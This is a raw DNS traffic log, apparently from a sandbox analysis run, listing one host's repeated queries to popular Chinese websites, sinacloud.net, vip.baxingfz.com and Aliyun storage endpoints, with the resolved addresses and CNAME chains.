                                                                                                                                    Aug 6, 2024 10:29:16.680048943 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.hao123.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.681225061 CEST192.168.2.68.8.8.80x100Standard query (0)www.hao123.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.742954016 CEST192.168.2.6114.114.114.1140x100Standard query (0)youdao.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.743235111 CEST192.168.2.68.8.8.80x100Standard query (0)youdao.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.805212021 CEST192.168.2.6114.114.114.1140x100Standard query (0)foodmate.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.806539059 CEST192.168.2.68.8.8.80x100Standard query (0)foodmate.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.866971016 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.jmw.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.867253065 CEST192.168.2.68.8.8.80x100Standard query (0)www.jmw.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.930974960 CEST192.168.2.68.8.8.80x100Standard query (0)www.cdstm.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.931505919 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.cdstm.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.993026972 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.eastmoney.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.994179964 CEST192.168.2.68.8.8.80x100Standard query (0)www.eastmoney.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.061537981 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.tencent.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.062645912 CEST192.168.2.68.8.8.80x100Standard query (0)www.tencent.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.160557985 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.cctv.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.161935091 CEST192.168.2.68.8.8.80x100Standard query (0)www.cctv.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.228934050 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.hupu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.249516010 CEST192.168.2.68.8.8.80x100Standard query (0)www.hupu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.289525986 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.autohome.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.290702105 CEST192.168.2.68.8.8.80x100Standard query (0)www.autohome.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.350898027 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.jb51.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.351804972 CEST192.168.2.68.8.8.80x100Standard query (0)www.jb51.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.416558981 CEST192.168.2.6114.114.114.1140x100Standard query (0)xianggangcs.oss-accelerate.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.479969978 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.zhihu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.485568047 CEST192.168.2.68.8.8.80x100Standard query (0)www.zhihu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.486685991 CEST192.168.2.68.8.8.80x100Standard query (0)xianggangcs.oss-accelerate.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:18.859138966 CEST192.168.2.6114.114.114.1140x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:18.859142065 CEST192.168.2.68.8.8.80x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:19.301512957 CEST192.168.2.6114.114.114.1140x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:19.301518917 CEST192.168.2.68.8.8.80x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:33.846215010 CEST192.168.2.68.8.8.80x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:33.846216917 CEST192.168.2.6114.114.114.1140x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.667958975 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.douyin.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.668867111 CEST192.168.2.68.8.8.80x100Standard query (0)www.douyin.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.725893974 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.kuaishou.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.737128973 CEST192.168.2.68.8.8.80x100Standard query (0)www.kuaishou.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.788263083 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.iqiyi.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.789108992 CEST192.168.2.68.8.8.80x100Standard query (0)www.iqiyi.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.857352018 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.sohu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.858258009 CEST192.168.2.68.8.8.80x100Standard query (0)www.sohu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.918531895 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.sogou.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.919440031 CEST192.168.2.68.8.8.80x100Standard query (0)www.sogou.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.975872993 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.qq.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:00.976682901 CEST192.168.2.68.8.8.80x100Standard query (0)www.qq.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.046725035 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.sina.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.047578096 CEST192.168.2.68.8.8.80x100Standard query (0)www.sina.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.102458000 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.so.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.103379011 CEST192.168.2.68.8.8.80x100Standard query (0)www.so.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220355034 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220412016 CEST192.168.2.68.8.8.80x100Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.275808096 CEST192.168.2.6114.114.114.1140x100Standard query (0)soso.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.280694008 CEST192.168.2.68.8.8.80x100Standard query (0)soso.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.335782051 CEST192.168.2.68.8.8.80x100Standard query (0)www.jd.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.336170912 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.jd.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.398235083 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.1688.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.398303986 CEST192.168.2.68.8.8.80x100Standard query (0)www.1688.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.460153103 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.hao123.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.461935043 CEST192.168.2.68.8.8.80x100Standard query (0)www.hao123.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.522444963 CEST192.168.2.6114.114.114.1140x100Standard query (0)youdao.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.523467064 CEST192.168.2.68.8.8.80x100Standard query (0)youdao.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.585089922 CEST192.168.2.6114.114.114.1140x100Standard query (0)foodmate.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.585092068 CEST192.168.2.68.8.8.80x100Standard query (0)foodmate.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.647608042 CEST192.168.2.68.8.8.80x100Standard query (0)www.jmw.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.647656918 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.jmw.com.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.710131884 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.cdstm.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.710187912 CEST192.168.2.68.8.8.80x100Standard query (0)www.cdstm.cnA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.773154974 CEST192.168.2.68.8.8.80x100Standard query (0)www.eastmoney.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.773387909 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.eastmoney.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.835818052 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.tencent.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.836400032 CEST192.168.2.68.8.8.80x100Standard query (0)www.tencent.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.899612904 CEST192.168.2.68.8.8.80x100Standard query (0)www.cctv.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.899940968 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.cctv.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.966033936 CEST192.168.2.6114.114.114.1140x100Standard query (0)zhangjiakoucs.oss-accelerate.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.967104912 CEST192.168.2.68.8.8.80x100Standard query (0)zhangjiakoucs.oss-accelerate.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.967808008 CEST192.168.2.6114.114.114.1140x100Standard query (0)www.hupu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.968305111 CEST192.168.2.68.8.8.80x100Standard query (0)www.hupu.comA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:03.858536959 CEST192.168.2.68.8.8.80x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:03.858745098 CEST192.168.2.6114.114.114.1140x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:04.380671024 CEST192.168.2.6114.114.114.1140x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:04.381463051 CEST192.168.2.68.8.8.80x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:16.086548090 CEST192.168.2.68.8.8.80x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:16.087412119 CEST192.168.2.6114.114.114.1140x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:23.708192110 CEST192.168.2.6114.114.114.1140x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:23.708462000 CEST192.168.2.68.8.8.80x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:33.922277927 CEST192.168.2.6114.114.114.1140x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:33.923546076 CEST192.168.2.68.8.8.80x100Standard query (0)sinacloud.netA (IP address)IN (0x0001)false

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Aug 6, 2024 10:29:14.930998087 CEST1.1.1.1192.168.2.60xd05No error (0)vip.baxingfz.com43.154.89.236A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.425834894 CEST8.8.8.8192.168.2.60x100No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.425834894 CEST8.8.8.8192.168.2.60x100No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.425834894 CEST8.8.8.8192.168.2.60x100No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.425834894 CEST8.8.8.8192.168.2.60x100No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.495043039 CEST8.8.8.8192.168.2.60x100No error (0)www.qq.comwww.qq.com.eo.dnse2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.495043039 CEST8.8.8.8192.168.2.60x100No error (0)www.qq.com.eo.dnse2.com43.152.186.103A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.572799921 CEST8.8.8.8192.168.2.60x100No error (0)www.jd.comwww.jd.com.gslb.qianxun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.572799921 CEST8.8.8.8192.168.2.60x100No error (0)www.jd.com.gslb.qianxun.comjd-abroad.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.572799921 CEST8.8.8.8192.168.2.60x100No error (0)jd-abroad.cdn20.com163.171.132.119A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)www.sina.com.cnspool.grid.sinaedge.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)spool.grid.sinaedge.comww1.sinaimg.cn.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.245A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.239A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.242A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.246A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.241A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.243A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.240A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.575309992 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.204A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.580492973 CEST114.114.114.114192.168.2.60x100No error (0)www.sogou.com119.28.109.132A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.580724001 CEST8.8.8.8192.168.2.60x100No error (0)www.so.comso.seos-lb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.580724001 CEST8.8.8.8192.168.2.60x100No error (0)so.seos-lb.com104.192.110.226A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.593676090 CEST114.114.114.114192.168.2.60x100No error (0)www.so.comso.seos-lb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.593676090 CEST114.114.114.114192.168.2.60x100No error (0)so.seos-lb.com104.192.110.226A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.603975058 CEST8.8.8.8192.168.2.60x100No error (0)www.sogou.com119.28.109.132A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.664571047 CEST114.114.114.114192.168.2.60x100No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.664571047 CEST114.114.114.114192.168.2.60x100No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.664571047 CEST114.114.114.114192.168.2.60x100No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.664571047 CEST114.114.114.114192.168.2.60x100No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.667047977 CEST114.114.114.114192.168.2.60x100No error (0)www.qq.comwww.qq.com.eo.dnse2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.667047977 CEST114.114.114.114192.168.2.60x100No error (0)www.qq.com.eo.dnse2.com43.132.73.61A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.750158072 CEST8.8.8.8192.168.2.60x100No error (0)youdao.com111.124.200.101A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.780317068 CEST114.114.114.114192.168.2.60x100No error (0)www.1688.comwww.1688.com.danuoyi.tbcache.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.780317068 CEST114.114.114.114192.168.2.60x100No error (0)www.1688.com.danuoyi.tbcache.com163.181.199.199A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.780317068 CEST114.114.114.114192.168.2.60x100No error (0)www.1688.com.danuoyi.tbcache.com163.181.199.200A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.789450884 CEST114.114.114.114192.168.2.60x100No error (0)www.jd.comwww.jd.com.gslb.qianxun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.789450884 CEST114.114.114.114192.168.2.60x100No error (0)www.jd.com.gslb.qianxun.comjd-abroad.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.789450884 CEST114.114.114.114192.168.2.60x100No error (0)jd-abroad.cdn20.com138.113.236.64A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.789450884 CEST114.114.114.114192.168.2.60x100No error (0)jd-abroad.cdn20.com138.113.112.18A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.817569017 CEST114.114.114.114192.168.2.60x100No error (0)soso.comsh2.general.proxy.sogou.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.817569017 CEST114.114.114.114192.168.2.60x100No error (0)sh2.general.proxy.sogou.com49.51.65.181A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.820195913 CEST8.8.8.8192.168.2.60x100No error (0)soso.comsh2.general.proxy.sogou.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.820195913 CEST8.8.8.8192.168.2.60x100No error (0)sh2.general.proxy.sogou.com49.51.130.237A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.913837910 CEST114.114.114.114192.168.2.60x100No error (0)youdao.com111.124.200.101A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.935386896 CEST114.114.114.114192.168.2.60x100No error (0)www.hao123.comhao123.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.935386896 CEST114.114.114.114192.168.2.60x100No error (0)hao123.n.shifen.com103.235.46.98A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.973156929 CEST8.8.8.8192.168.2.60x100No error (0)www.hao123.comhao123.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:16.973156929 CEST8.8.8.8192.168.2.60x100No error (0)hao123.n.shifen.com103.235.46.98A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.007211924 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.comwww.eastmoney.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.007211924 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.231A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.007211924 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.232A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.007211924 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.228A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.007211924 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.233A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.007211924 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.234A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.007211924 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.235A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.007211924 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.230A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.096920013 CEST8.8.8.8192.168.2.60x100No error (0)www.jmw.com.cn47.94.225.221A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.115356922 CEST114.114.114.114192.168.2.60x100No error (0)www.jmw.com.cn47.94.225.221A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST8.8.8.8192.168.2.60x100No error (0)www.sina.com.cnspool.grid.sinaedge.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST8.8.8.8192.168.2.60x100No error (0)spool.grid.sinaedge.comww1.sinaimg.cn.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.231A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.230A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.228A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.233A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.235A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.232A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.143141031 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.234A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.175231934 CEST114.114.114.114192.168.2.60x100No error (0)www.cdstm.cnwww.cdstm.cn.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.175231934 CEST114.114.114.114192.168.2.60x100No error (0)www.cdstm.cn.a.bdydns.comopencdnka.jomodns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.175231934 CEST114.114.114.114192.168.2.60x100No error (0)opencdnka.jomodns.com113.219.142.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.175774097 CEST114.114.114.114192.168.2.60x100No error (0)foodmate.net120.26.110.170A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.200793982 CEST8.8.8.8192.168.2.60x100No error (0)www.1688.comwww.1688.com.danuoyi.tbcache.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.200793982 CEST8.8.8.8192.168.2.60x100No error (0)www.1688.com.danuoyi.tbcache.com163.181.92.213A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.200793982 CEST8.8.8.8192.168.2.60x100No error (0)www.1688.com.danuoyi.tbcache.com163.181.92.212A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.222373962 CEST8.8.8.8192.168.2.60x100No error (0)foodmate.net120.26.110.170A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.230787039 CEST8.8.8.8192.168.2.60x100No error (0)www.tencent.comwww.tencent.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.230787039 CEST8.8.8.8192.168.2.60x100No error (0)www.tencent.com.cdn.dnsv1.comwww.tencent.com.acc.edgeonedy1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.230787039 CEST8.8.8.8192.168.2.60x100No error (0)www.tencent.com.acc.edgeonedy1.com43.159.118.238A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.230787039 CEST8.8.8.8192.168.2.60x100No error (0)www.tencent.com.acc.edgeonedy1.com43.159.119.252A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.314842939 CEST114.114.114.114192.168.2.60x100No error (0)www.tencent.comwww.tencent.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.314842939 CEST114.114.114.114192.168.2.60x100No error (0)www.tencent.com.cdn.dnsv1.comwww.tencent.com.acc.edgeonedy1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.314842939 CEST114.114.114.114192.168.2.60x100No error (0)www.tencent.com.acc.edgeonedy1.com43.159.119.252A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.314842939 CEST114.114.114.114192.168.2.60x100No error (0)www.tencent.com.acc.edgeonedy1.com43.159.118.238A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.comwww.eastmoney.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:29:17.322776079 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.241A (IP address)IN (0x0001)false
